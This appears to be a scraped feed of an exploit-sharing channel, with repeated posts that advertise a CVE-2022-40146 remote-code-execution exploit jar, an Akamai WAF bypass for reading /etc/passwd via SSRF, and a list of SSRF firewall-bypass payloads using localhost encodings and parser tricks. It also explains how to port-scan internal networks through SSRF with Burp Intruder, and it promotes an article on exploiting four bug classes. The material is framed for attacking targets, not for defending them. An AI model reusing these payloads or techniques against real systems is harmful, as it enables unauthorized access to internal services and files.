CVE-2022-40146_Exploit_Jar-master.zip
5.9 KB
CVE-2022-40146 ( SSRF and RCE Through Remote Class Loading ) Exploit
Link
#Exploit #RCE #SSRF
——————
0Day.Today
@LearnExploit
@Tech_Army
Link
#Exploit #RCE #SSRF
——————
0Day.Today
@LearnExploit
@Tech_Army
❤1
Akamai WAF Bypass read internal files via SSRF
#SSRF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
target[.]com/download?url=file:///etc/passwd (Blocked by akamai waf)#SSRF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥3⚡2❤🔥1
Automating SSRF using Autorepeater
In the window of Auto-Repeater, we can specify some regex to find urls.
#SSRF
——————
0Day.Today
@LearnExploit
@Tech_Army
In the window of Auto-Repeater, we can specify some regex to find urls.
https?:\/\/(www\.)?[-a-zA-Z0–9@:%._\+~#=]{1,256}\.[a-zA-Z0–9()]{1,6}\b([-a-zA-Z0–9()@:%_\+.~#?&//=]*)#SSRF
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡4👍1
SSRF Payloads To Bypass Firewall
Here are 5 payloads that could be used for bypassing defenses when it comes to SSRF (Server-Side Request Forgery):
http://127.127.127.127
http://127.0.0.0
http://127.1
http://0
http://1.1.1.1 &Q2.2.2.2# @3.3.3.3/ urllib : 3.3.3.3
http://127.1.1.1:80\@127.2.2.2:80/
http://[::1:80/
http://0000::1:80/
Let's remind ourselves what SSRF vulnerabilities are and what can we do with them. In general, SSRF allows us to:
Access services on the loopback interface running on the remote server. Scan internal network an potentially interact with the discovered services
Read local files on the server using file:// protocol handler
Move laterally / pivoting into the internal environment
How to find SSRF? When the target web application allows us to access external resources, e.g. a profile image loaded from external URL (running on a 3rd party website), we can try to load internal resources accessible by the vulnerable web application.
For example:
We discover that the following URL works:
We can then run Intruder attack (Burp Suite) trying different ports, effectively doing a port scan of the host. We can also try to scan private IPs such as 192.168.x.x and discover alive IPs in the internal network
#SSRF #Bypass #Waf #Firewall #Payload #exploit #Xploit
〰️〰️〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
@LearnExploit
Here are 5 payloads that could be used for bypassing defenses when it comes to SSRF (Server-Side Request Forgery):
1) Bypass SSRF with CIDR:http://127.127.127.127
http://127.0.0.0
2) Bypass using rare address:http://127.1
http://0
3) Bypass using tricks combination:http://1.1.1.1 &Q2.2.2.2# @3.3.3.3/ urllib : 3.3.3.3
4) Bypass against a weak parser:http://127.1.1.1:80\@127.2.2.2:80/
5) Bypass localhost with [:]:http://[::1:80/
http://0000::1:80/
Let's remind ourselves what SSRF vulnerabilities are and what can we do with them. In general, SSRF allows us to:
Access services on the loopback interface running on the remote server. Scan internal network an potentially interact with the discovered services
Read local files on the server using file:// protocol handler
Move laterally / pivoting into the internal environment
How to find SSRF? When the target web application allows us to access external resources, e.g. a profile image loaded from external URL (running on a 3rd party website), we can try to load internal resources accessible by the vulnerable web application.
For example:
We discover that the following URL works:
https://example.com: 8000/page?
user=&link=https://127.0.0.1:8000
We can then run Intruder attack (Burp Suite) trying different ports, effectively doing a port scan of the host. We can also try to scan private IPs such as 192.168.x.x and discover alive IPs in the internal network
#SSRF #Bypass #Waf #Firewall #Payload #exploit #Xploit
〰️〰️〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
@LearnExploit
👍3💔3
✅ Article introducing and exploiting 4 bugs
✅ مقاله ی معرفی و اکسپلویت کردن 4 باگ :
#Article
#Exploit #Xploit #Bugbounty
#Bug #SSRF #CSRF #SSO
➖➖➖➖➖➖➖➖
♨️ IR0Day.Today Bax ♨️
⚠️ @LearnExploit
✅ مقاله ی معرفی و اکسپلویت کردن 4 باگ :
1. path traversal
2. business logic
3. single sign-on (SSO) Misconfiguration
4. Insecure Deserialization
#Article
#Exploit #Xploit #Bugbounty
#Bug #SSRF #CSRF #SSO
➖➖➖➖➖➖➖➖
♨️ IR0Day.Today Bax ♨️
⚠️ @LearnExploit
Article introducing and exploiting 4 bugs.pdf
376.6 KB
✅ Article introducing and exploiting 4 bugs
✅ مقاله ی معرفی و اکسپلویت کردن 4 باگ :
#Article
#Exploit #Xploit #Bugbounty
#Bug #SSRF #CSRF #SSO
➖➖➖➖➖➖➖➖
♨️ IR0Day.Today Bax ♨️
⚠️ @LearnExploit
✅ مقاله ی معرفی و اکسپلویت کردن 4 باگ :
1. path traversal
2. business logic
3. single sign-on (SSO) Misconfiguration
4. Insecure Deserialization
#Article
#Exploit #Xploit #Bugbounty
#Bug #SSRF #CSRF #SSO
➖➖➖➖➖➖➖➖
♨️ IR0Day.Today Bax ♨️
⚠️ @LearnExploit